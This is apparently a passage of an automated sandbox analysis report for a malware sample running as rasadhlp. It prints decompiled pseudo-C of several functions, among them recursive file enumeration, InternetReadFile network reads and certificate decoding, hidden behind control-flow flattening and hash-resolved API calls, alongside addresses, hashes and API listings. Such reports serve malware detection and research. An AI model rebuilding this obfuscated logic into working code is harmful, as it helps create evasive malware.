					if(__eflags > 0) {
						__eflags = _t108 - 0x39e547fe;
						if(_t108 != 0x39e547fe) {
							goto L22;
						} else {
							_t93 =  *0x32dea8;
							__eflags = _t93;
							if(_t93 == 0) {
								_t93 = E00323E60(_t57, E00323F00(0x26f5757c), 0x37463e2d, _t120);
								 *0x32dea8 = _t93;
							}
							_t24 =  *0x32e544; // 0x5944a8
							_t14 = _t24 + 0x1c; // 0x5944c4
							_t15 = _t24 + 0xc; // 0x2d60778
							_t25 =  *_t93( *_t15, 0x8004, 0, 0, _t14);
							__eflags = _t25;
							if(_t25 != 0) {
								return 1;
							} else {
								_t108 = 0xc4be8e9;
								goto L1;
							}
						}
					} else {
						if(__eflags == 0) {
							_t43 =  *0x32dc90; // 0x0
							__eflags = _t43;
							if(_t43 == 0) {
								_t43 = E00323E60(_t57, E00323F00(0x26f5757c), 0x31bce963, _t120);
								 *0x32dc90 = _t43;
							}
							_t81 =  *0x32e544; // 0x5944a8
							_t13 = _t81 + 0xc; // 0x2d60778
							 *_t43( *_t13, 0);
							_t108 = 0xd8f2d46;
							goto L1;
						} else {
							__eflags = _t108 - 0x28da2e5d;
							if(_t108 == 0x28da2e5d) {
								_t100 =  *0x32de5c;
								__eflags = _t100;
								if(_t100 == 0) {
									_t100 = E00323E60(_t57, E00323F00(0x26f5757c), 0x295786c8, _t120);
									 *0x32de5c = _t100;
								}
								_t45 =  *0x32e544; // 0x5944a8
								_t11 = _t45 + 0x10; // 0x5944b8
								_t12 = _t45 + 0xc; // 0x2d60778
								_t46 =  *_t100( *_t12, 0x660e, 1, _t11);
								asm("sbb esi, esi");
								_t108 = ( ~_t46 & 0x0653492f) + 0x3391fecf;
								goto L1;
							} else {
								__eflags = _t108 - 0x3391fecf;
								if(_t108 != 0x3391fecf) {
									goto L22;
								} else {
									_t49 =  *0x32db2c; // 0x0
									__eflags = _t49;
									if(_t49 == 0) {
										_t49 = E00323E60(_t57, E00323F00(0x26f5757c), 0x16451606, _t120);
										 *0x32db2c = _t49;
									}
									_t87 =  *0x32e544; // 0x5944a8
									_t10 = _t87 + 8; // 0x2d609c8
									 *_t49( *_t10);
									_t108 = 0x344059be;
									goto L1;
								}
							}
						}
					}
					goto L51;
					L22:
					__eflags = _t108 - 0x1ee1b4ef;
				} while (_t108 != 0x1ee1b4ef);
				L23:
				__eflags = 0;
				return 0;
				goto L51;
			}





































                                                                                0x003225e5
                                                                                0x003225e7
                                                                                0x003225e7
                                                                                0x003225f0
                                                                                0x003225f0
                                                                                0x003225f0
                                                                                0x003225f0
                                                                                0x003225f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003225fc
                                                                                0x00322779
                                                                                0x0032277e
                                                                                0x00322780
                                                                                0x00322793
                                                                                0x00322798
                                                                                0x00322798
                                                                                0x0032279d
                                                                                0x003227b2
                                                                                0x003227b8
                                                                                0x003227c0
                                                                                0x00000000
                                                                                0x00322602
                                                                                0x00322602
                                                                                0x00322608
                                                                                0x0032267b
                                                                                0x00322681
                                                                                0x003226e9
                                                                                0x003226ef
                                                                                0x003226f1
                                                                                0x00322709
                                                                                0x0032270b
                                                                                0x0032270b
                                                                                0x00322711
                                                                                0x00322716
                                                                                0x00322726
                                                                                0x00322729
                                                                                0x0032272d
                                                                                0x0032272f
                                                                                0x0032273a
                                                                                0x00322740
                                                                                0x00322742
                                                                                0x00322755
                                                                                0x0032275a
                                                                                0x0032275a
                                                                                0x00322763
                                                                                0x00000000
                                                                                0x00322683
                                                                                0x00322683
                                                                                0x00322689
                                                                                0x00000000
                                                                                0x0032268f
                                                                                0x0032268f
                                                                                0x00322694
                                                                                0x00322696
                                                                                0x003226a9
                                                                                0x003226ae
                                                                                0x003226ae
                                                                                0x003226d0
                                                                                0x003226d6
                                                                                0x003226de
                                                                                0x00000000
                                                                                0x003226de
                                                                                0x00322689
                                                                                0x0032260a
                                                                                0x0032260a
                                                                                0x00322912
                                                                                0x00322917
                                                                                0x0032291d
                                                                                0x0032291f
                                                                                0x00322932
                                                                                0x00322937
                                                                                0x00322937
                                                                                0x0032293e
                                                                                0x00322940
                                                                                0x00322945
                                                                                0x00322947
                                                                                0x0032295a
                                                                                0x0032295f
                                                                                0x0032295f
                                                                                0x00322968
                                                                                0x0032296b
                                                                                0x00322971
                                                                                0x00322610
                                                                                0x00322616
                                                                                0x0032265f
                                                                                0x00322664
                                                                                0x00322669
                                                                                0x0032266b
                                                                                0x00000000
                                                                                0x00322671
                                                                                0x00322671
                                                                                0x00000000
                                                                                0x00322671
                                                                                0x00322618
                                                                                0x0032261e
                                                                                0x00000000
                                                                                0x00322624
                                                                                0x00322624
                                                                                0x0032262b
                                                                                0x0032263e
                                                                                0x00322643
                                                                                0x00322643
                                                                                0x00322648
                                                                                0x0032264e
                                                                                0x00322651
                                                                                0x00322653
                                                                                0x00000000
                                                                                0x00322653
                                                                                0x0032261e
                                                                                0x00322616
                                                                                0x0032260a
                                                                                0x00322608
                                                                                0x00000000
                                                                                0x003225fc
                                                                                0x003227cb
                                                                                0x003227d1
                                                                                0x003228b9
                                                                                0x003228bf
                                                                                0x00000000
                                                                                0x003228c5
                                                                                0x003228c5
                                                                                0x003228cb
                                                                                0x003228cd
                                                                                0x003228e5
                                                                                0x003228e7
                                                                                0x003228e7
                                                                                0x003228ed
                                                                                0x003228f2
                                                                                0x003228ff
                                                                                0x00322902
                                                                                0x00322904
                                                                                0x00322906
                                                                                0x0032297c
                                                                                0x00322908
                                                                                0x00322908
                                                                                0x00000000
                                                                                0x00322908
                                                                                0x00322906
                                                                                0x003227d7
                                                                                0x003227d7
                                                                                0x0032287e
                                                                                0x00322883
                                                                                0x00322885
                                                                                0x00322898
                                                                                0x0032289d
                                                                                0x0032289d
                                                                                0x003228a2
                                                                                0x003228aa
                                                                                0x003228ad
                                                                                0x003228af
                                                                                0x00000000
                                                                                0x003227dd
                                                                                0x003227dd
                                                                                0x003227e3
                                                                                0x0032282a
                                                                                0x00322830
                                                                                0x00322832
                                                                                0x0032284a
                                                                                0x0032284c
                                                                                0x0032284c
                                                                                0x00322852
                                                                                0x00322857
                                                                                0x00322862
                                                                                0x00322865
                                                                                0x0032286b
                                                                                0x00322873
                                                                                0x00000000
                                                                                0x003227e5
                                                                                0x003227e5
                                                                                0x003227eb
                                                                                0x00000000
                                                                                0x003227f1
                                                                                0x003227f1
                                                                                0x003227f6
                                                                                0x003227f8
                                                                                0x0032280b
                                                                                0x00322810
                                                                                0x00322810
                                                                                0x00322815
                                                                                0x0032281b
                                                                                0x0032281e
                                                                                0x00322820
                                                                                0x00000000
                                                                                0x00322820
                                                                                0x003227eb
                                                                                0x003227e3
                                                                                0x003227d7
                                                                                0x00000000
                                                                                0x00322765
                                                                                0x00322765
                                                                                0x00322765
                                                                                0x00322772
                                                                                0x00322772
                                                                                0x00322778
                                                                                0x00000000

                                                                                APIs
                                                                                • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?), ref: 003226D0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CryptDecodeObject
                                                                                • String ID: ->F7
                                                                                • API String ID: 1207547050-1131884009
                                                                                • Opcode ID: 464c86d5e9c5c09b4933bc36cb945bbea7aee77c869be65c389abc2aaab5f393
                                                                                • Instruction ID: fd86b63c63b89584de83d71dee9f98a3a36898abf4cb5a24d171d31eb5003236
                                                                                • Opcode Fuzzy Hash: 464c86d5e9c5c09b4933bc36cb945bbea7aee77c869be65c389abc2aaab5f393
                                                                                • Instruction Fuzzy Hash: FF81F632F002316BDB36AB69FD51B67729AAB94710F16802DF505DF2A5FA74CC018B81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003238F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 519 3238f0-32390b 520 323910-323915 519->520 521 32391b 520->521 522 323a69-323a6e 520->522 525 323921-323926 521->525 526 323a5f-323a64 521->526 523 323a70-323a75 522->523 524 323acc-323adf call 3234c0 522->524 527 323ab6-323abb 523->527 528 323a77-323a7e 523->528 540 323ae1-323af7 call 323f00 call 323e60 524->540 541 323afc-323b17 524->541 529 323a17-323a1e 525->529 530 32392c-323931 525->530 526->520 527->520 537 323ac1-323acb 527->537 533 323a80-323a96 call 323f00 call 323e60 528->533 534 323a9b-323ab1 528->534 535 323a20-323a36 call 323f00 call 323e60 529->535 536 323a3b-323a4f FindFirstFileW 529->536 538 323b70-323b77 530->538 539 323937-32393c 530->539 533->534 534->520 535->536 546 323b97-323ba1 536->546 547 323a55-323a5a 536->547 544 323b94 538->544 545 323b79-323b8f call 323f00 call 323e60 538->545 539->527 548 323942-323947 539->548 540->541 569 323b34-323b3f 541->569 570 323b19-323b2f call 323f00 call 323e60 541->570 544->546 545->544 547->520 549 3239f1-323a12 548->549 550 32394d-323953 548->550 549->520 556 323974-323976 550->556 557 323955-32395d 550->557 564 32396d-323972 556->564 566 323978-32398b call 3234c0 556->566 563 32395f-323963 557->563 557->564 563->556 573 323965-32396b 563->573 564->520 583 3239a8-3239ec call 3238f0 call 323460 566->583 584 32398d-3239a3 call 323f00 call 323e60 566->584 581 323b41-323b57 call 323f00 call 323e60 569->581 582 323b5c-323b6b 569->582 570->569 573->556 573->564 581->582 582->520 583->520 584->583
                                                                                C-Code - Quality: 63%
                                                                                			E003238F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x32e430 == 0) {
								 *0x32e430 = E00323E60(_t56, E00323F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x32dba4;
								if(_t42 == 0) {
									_t42 = E00323E60(_t56, E00323F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x32dba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E003234C0(0x32d290);
											_t50 =  *0x32e158;
											if(_t50 == 0) {
												_t50 = E00323E60(_t56, E00323F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x32e158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E003238F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E00323460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E003234C0(0x32d260);
					_t24 =  *0x32e158;
					if(_t24 == 0) {
						_t24 = E00323E60(_t56, E00323F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x32e158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x32e494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E00323E60(_t56, E00323F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x32e494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x32df30;
					if(_t28 == 0) {
						_t28 = E00323E60(_t56, E00323F00(0x9bab0b12), 0x5010a54d, _t95);
						 *0x32df30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x32df88;
						if(_t33 == 0) {
							_t33 = E00323E60(_t56, E00323F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x32df88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x003238fa
                                                                                0x003238fc
                                                                                0x003238fe
                                                                                0x00323902
                                                                                0x00323907
                                                                                0x00323910
                                                                                0x00323910
                                                                                0x00323910
                                                                                0x00323915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0032391b
                                                                                0x00323a5f
                                                                                0x00000000
                                                                                0x00323921
                                                                                0x00323926
                                                                                0x00323a1e
                                                                                0x00323a36
                                                                                0x00323a36
                                                                                0x00323a48
                                                                                0x00323a4a
                                                                                0x00323a4f
                                                                                0x00323ba1
                                                                                0x00323a55
                                                                                0x00323a55
                                                                                0x00000000
                                                                                0x00323a55
                                                                                0x0032392c
                                                                                0x00323931
                                                                                0x00323b70
                                                                                0x00323b77
                                                                                0x00323b8a
                                                                                0x00323b8f
                                                                                0x00323b8f
                                                                                0x00000000
                                                                                0x00323b95
                                                                                0x0032393c
                                                                                0x00323ab6
                                                                                0x00323abb
                                                                                0x00000000
                                                                                0x00323acb
                                                                                0x00323acb
                                                                                0x00323acb
                                                                                0x00323942
                                                                                0x00323947
                                                                                0x003239fd
                                                                                0x00323a06
                                                                                0x00323a0d
                                                                                0x0032394d
                                                                                0x00323953
                                                                                0x00323974
                                                                                0x00323976
                                                                                0x00000000
                                                                                0x00323978
                                                                                0x00323982
                                                                                0x00323984
                                                                                0x0032398b
                                                                                0x0032399e
                                                                                0x003239a3
                                                                                0x003239a3
                                                                                0x003239bc
                                                                                0x003239d8
                                                                                0x003239dd
                                                                                0x003239e2
                                                                                0x003239e7
                                                                                0x003239e7
                                                                                0x00323955
                                                                                0x00323955
                                                                                0x0032395d
                                                                                0x0032396d
                                                                                0x0032396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0032395d
                                                                                0x00323953
                                                                                0x00000000
                                                                                0x00323947
                                                                                0x0032393c
                                                                                0x00323926
                                                                                0x00000000
                                                                                0x0032391b
                                                                                0x00323a6e
                                                                                0x00323ad6
                                                                                0x00323ad8
                                                                                0x00323adf
                                                                                0x00323af2
                                                                                0x00323af7
                                                                                0x00323af7
                                                                                0x00323b0b
                                                                                0x00323b0d
                                                                                0x00323b12
                                                                                0x00323b17
                                                                                0x00323b2a
                                                                                0x00323b2f
                                                                                0x00323b2f
                                                                                0x00323b36
                                                                                0x00323b38
                                                                                0x00323b3f
                                                                                0x00323b52
                                                                                0x00323b57
                                                                                0x00323b57
                                                                                0x00323b60
                                                                                0x00323b62
                                                                                0x00323b66
                                                                                0x00000000
                                                                                0x00323a70
                                                                                0x00323a75
                                                                                0x00000000
                                                                                0x00323a77
                                                                                0x00323a77
                                                                                0x00323a7e
                                                                                0x00323a91
                                                                                0x00323a96
                                                                                0x00323a96
                                                                                0x00323aa1
                                                                                0x00323aa5
                                                                                0x00323aac
                                                                                0x00000000
                                                                                0x00323aac
                                                                                0x00323a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00323A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: 1b3d1b21419dee0029035a9767b54c5825b50ee8738c9d1b445a739be9c70a08
                                                                                • Instruction ID: c9d682b3b1052cd1531ab3e8c9b341998cce87fa43a2c2f10d3c6f8ee45b1d7c
                                                                                • Opcode Fuzzy Hash: 1b3d1b21419dee0029035a9767b54c5825b50ee8738c9d1b445a739be9c70a08
                                                                                • Instruction Fuzzy Hash: DC5124317042214BCB36AB68F845B7B36AA9B91700F11092DF496DB351EB7DCF458792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00322980, Relevance: 1.6, APIs: 1, Instructions: 150filenetworkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00322980(void* __ecx, intOrPtr* __edx) {
				char _v4;
				char _v8;
				void* _v12;
				long _v16;
				void* _v24;
				intOrPtr _v32;
				void* __ebx;
				void* __ebp;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr* _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				int _t37;
				void* _t40;
				intOrPtr _t50;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				void* _t69;
				int _t70;
				void* _t72;

				_t40 = __ecx;
				_t66 = 0;
				_t68 = __edx;
				_v12 = __ecx;
				_t70 = 0;
				_t15 = 0xc266425;
				goto L1;
				do {
					while(1) {
						L1:
						_t72 = _t15 - 0x27e56916;
						if(_t72 > 0) {
							break;
						}
						if(_t72 == 0) {
							if( *0x32dd6c == 0) {
								 *0x32dd6c = E00323E60(_t40, E00323F00(0xb37bd66), 0xf49e4486, _t70);
							}
							_t37 = InternetReadFile(_t40,  *_t68 +  *((intOrPtr*)(_t68 + 4)), _t66 -  *((intOrPtr*)(_t68 + 4)),  &_v16); // executed
							_t70 = _t37;
							if(_t70 == 0) {
								L23:
								_t19 =  *0x32e494;
								_t67 =  *_t68;
								if(_t19 == 0) {
									_t19 = E00323E60(_t40, E00323F00(0x9bab0b12), 0x7facde30, _t70);
									 *0x32e494 = _t19;
								}
								_t69 =  *_t19();
								_t21 =  *0x32df30;
								if(_t21 == 0) {
									_t21 = E00323E60(_t40, E00323F00(0x9bab0b12), 0x5010a54d, _t70);
									 *0x32df30 = _t21;
								}
								 *_t21(_t69, 0, _t67);
								L28:
								return _t70;
							} else {
								_t50 = _v32;
								if(_t50 == 0) {
									goto L22;
								}
								 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t68 + 4)) + _t50;
								_t15 = 0x1dd65e9f;
								continue;
							}
						}
						if(_t15 == 0xc266425) {
							_t15 = 0x2cad54f3;
							continue;
						}
						if(_t15 != 0x1dd65e9f) {
							goto L21;
						}
						if( *((intOrPtr*)(_t68 + 4)) >= _t66) {
							goto L22;
						}
						_t15 = 0x27e56916;
					}
					if(_t15 == 0x2cad54f3) {
						_t16 =  *0x32e1e8;
						_v8 = 4;
						if(_t16 == 0) {
							_t16 = E00323E60(_t40, E00323F00(0xb37bd66), 0x30c1111c, _t70);
							 *0x32e1e8 = _t16;
						}
						_push(0);
						_push( &_v8);
						_push( &_v4);
						_push(0x20000005);
						_push(_t40);
						if( *_t16() == 0) {
							break;
						}
						_t66 = _v24;
						if(_t66 == 0) {
							break;
						}
						_t15 = 0x38591863;
						goto L1;
					}
					if(_t15 != 0x38591863) {
						goto L21;
					}
					_t26 =  *0x32e494;
					if(_t26 == 0) {
						_t26 = E00323E60(_t40, E00323F00(0x9bab0b12), 0x7facde30, _t70);
						 *0x32e494 = _t26;
					}
					_t40 =  *_t26();
					_t28 =  *0x32dd18;
					if(_t28 == 0) {
						_t28 = E00323E60(_t40, E00323F00(0x9bab0b12), 0x9ff0609c, _t70);
						 *0x32dd18 = _t28;
					}
					_t29 =  *_t28(_t40, 8, _t66);
					 *_t68 = _t29;
					if(_t29 == 0) {
						break;
					} else {
						_t40 = _v24;
						_t15 = 0x1dd65e9f;
						 *((intOrPtr*)(_t68 + 4)) = 0;
						goto L1;
					}
					L21:
				} while (_t15 != 0x28767710);
				L22:
				if(_t70 != 0) {
					goto L28;
				}
				goto L23;
			}



























                                                                                0x00322987
                                                                                0x00322989
                                                                                0x0032298b
                                                                                0x0032298d
                                                                                0x00322991
                                                                                0x00322993
                                                                                0x00322998
                                                                                0x003229a0
                                                                                0x003229a0
                                                                                0x003229a0
                                                                                0x003229a0
                                                                                0x003229a5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003229ab
                                                                                0x003229de
                                                                                0x003229f8
                                                                                0x003229f8
                                                                                0x00322a10
                                                                                0x00322a12
                                                                                0x00322a16
                                                                                0x00322ac3
                                                                                0x00322ac3
                                                                                0x00322ac8
                                                                                0x00322acc
                                                                                0x00322adf
                                                                                0x00322ae4
                                                                                0x00322ae4
                                                                                0x00322aeb
                                                                                0x00322aed
                                                                                0x00322af4
                                                                                0x00322b07
                                                                                0x00322b0c
                                                                                0x00322b0c
                                                                                0x00322b15
                                                                                0x00322b19
                                                                                0x00322b20
                                                                                0x00322a1c
                                                                                0x00322a1c
                                                                                0x00322a22
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00322a28
                                                                                0x00322a2b
                                                                                0x00000000
                                                                                0x00322a2b
                                                                                0x00322a16
                                                                                0x003229b2
                                                                                0x003229cf
                                                                                0x00000000
                                                                                0x003229cf
                                                                                0x003229b9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003229c2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003229c8
                                                                                0x003229c8
                                                                                0x00322a3a
                                                                                0x00322b21
                                                                                0x00322b26
                                                                                0x00322b30
                                                                                0x00322b43
                                                                                0x00322b48
                                                                                0x00322b48
                                                                                0x00322b4d
                                                                                0x00322b53
                                                                                0x00322b58
                                                                                0x00322b59
                                                                                0x00322b5e
                                                                                0x00322b63
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00322b69
                                                                                0x00322b6f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00322b75
                                                                                0x00000000
                                                                                0x00322b75
                                                                                0x00322a45
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00322a47
                                                                                0x00322a4e
                                                                                0x00322a61
                                                                                0x00322a66
                                                                                0x00322a66
                                                                                0x00322a6d
                                                                                0x00322a6f
                                                                                0x00322a76
                                                                                0x00322a89
                                                                                0x00322a8e
                                                                                0x00322a8e
                                                                                0x00322a97
                                                                                0x00322a99
                                                                                0x00322a9d
                                                                                0x00000000
                                                                                0x00322a9f
                                                                                0x00322a9f
                                                                                0x00322aa3
                                                                                0x00322aa8
                                                                                0x00000000
                                                                                0x00322aa8
                                                                                0x00322ab4
                                                                                0x00322ab4
                                                                                0x00322abf
                                                                                0x00322ac1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • InternetReadFile.WININET(?,?,?,?), ref: 00322A10
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileInternetRead
                                                                                • String ID:
                                                                                • API String ID: 778332206-0
                                                                                • Opcode ID: 25ae92ba3c867b78b848513050f6b80751dc996a69ec5d52fdb9268491704c56
                                                                                • Instruction ID: b7bbf9c1d392cdb29ffe160802bc14f9893889d915d58eb205e6c310415e6514
                                                                                • Opcode Fuzzy Hash: 25ae92ba3c867b78b848513050f6b80751dc996a69ec5d52fdb9268491704c56
                                                                                • Instruction Fuzzy Hash: 3741CF317043216BDB36EFADAC8172B72EEAB94740F26481DB401CB719EE34DD418792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003253D0, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E003253D0(void* __ebx, void* __ebp) {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				void* _t8;
				intOrPtr* _t13;
				intOrPtr* _t16;
				void* _t22;
				void* _t31;
				void* _t32;
				void* _t35;

				_t32 = __ebp;
				_t22 = __ebx;
				_t8 = 0x375d42ff;
				_t31 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t35 = _t8 - 0x2a3ce5bf;
						if(_t35 > 0) {
							break;
						}
						if(_t35 == 0) {
							_t13 =  *0x32e48c;
							if(_t13 == 0) {
								_t13 = E00323E60(_t22, E00323F00(0x9bab0b12), 0xd293227f, _t32);
								 *0x32e48c = _t13;
							}
							 *_t13( &_v320); // executed
							_t8 = 0x369c73bd;
							continue;
						} else {
							if(_t8 == 0x4168e76) {
								_t16 =  *0x32db60;
								_v284 = 0x11c;
								if(_t16 == 0) {
									_t16 = E00323E60(_t22, E00323F00(0xc6fbcd74), 0x1f37d559, _t32);
									 *0x32db60 = _t16;
								}
								 *_t16( &_v284);
								_t8 = 0x2a3ce5bf;
								continue;
							} else {
								if(_t8 == 0x13274375) {
									return (_v320 & 0x0000ffff) + _t31;
								} else {
									if(_t8 != 0x1c93af8c) {
										goto L17;
									} else {
										_t31 = _t31 + _v280 * 0x3e8;
										_t8 = 0x2cb8004a;
										continue;
									}
								}
							}
						}
						L22:
					}
					if(_t8 == 0x2cb8004a) {
						_t31 = _t31 + _v276 * 0x64;
						_t8 = 0x13274375;
						goto L1;
					} else {
						if(_t8 == 0x369c73bd) {
							_t31 = _t31 + (_v2 & 0x000000ff) * 0x186a0;
							_t8 = 0x1c93af8c;
							goto L1;
						} else {
							if(_t8 != 0x375d42ff) {
								goto L17;
							} else {
								_t8 = 0x4168e76;
								goto L1;
							}
						}
					}
					goto L22;
					L17:
				} while (_t8 != 0x38a43d91);
				return _t31;
				goto L22;
			}















                                                                                0x003253d0
                                                                                0x003253d0
                                                                                0x003253d6
                                                                                0x003253dc
                                                                                0x003253dc
                                                                                0x003253e0
                                                                                0x003253e0
                                                                                0x003253e0
                                                                                0x003253e0
                                                                                0x003253e5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003253eb
                                                                                0x00325455
                                                                                0x0032545c
                                                                                0x0032546f
                                                                                0x00325474
                                                                                0x00325474
                                                                                0x0032547e
                                                                                0x00325480
                                                                                0x00000000
                                                                                0x003253ed
                                                                                0x003253f2
                                                                                0x0032541b
                                                                                0x00325420
                                                                                0x0032542a
                                                                                0x0032543d
                                                                                0x00325442
                                                                                0x00325442
                                                                                0x0032544c
                                                                                0x0032544e
                                                                                0x00000000
                                                                                0x003253f4
                                                                                0x003253f9
                                                                                0x003254f7
                                                                                0x003253ff
                                                                                0x00325404
                                                                                0x00000000
                                                                                0x0032540a
                                                                                0x00325412
                                                                                0x00325414
                                                                                0x00000000
                                                                                0x00325414
                                                                                0x00325404
                                                                                0x003253f9
                                                                                0x003253f2
                                                                                0x00000000
                                                                                0x003253eb
                                                                                0x0032548f
                                                                                0x003254dd
                                                                                0x003254df
                                                                                0x00000000
                                                                                0x00325491
                                                                                0x00325496
                                                                                0x003254cc
                                                                                0x003254ce
                                                                                0x00000000
                                                                                0x00325498
                                                                                0x0032549d
                                                                                0x00000000
                                                                                0x0032549f
                                                                                0x0032549f
                                                                                0x00000000
                                                                                0x0032549f
                                                                                0x0032549d
                                                                                0x00325496
                                                                                0x00000000
                                                                                0x003254a9
                                                                                0x003254a9
                                                                                0x003254bd
                                                                                0x00000000

                                                                                APIs
                                                                                • GetNativeSystemInfo.KERNEL32(3251FEFE,3251FEFE), ref: 0032547E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
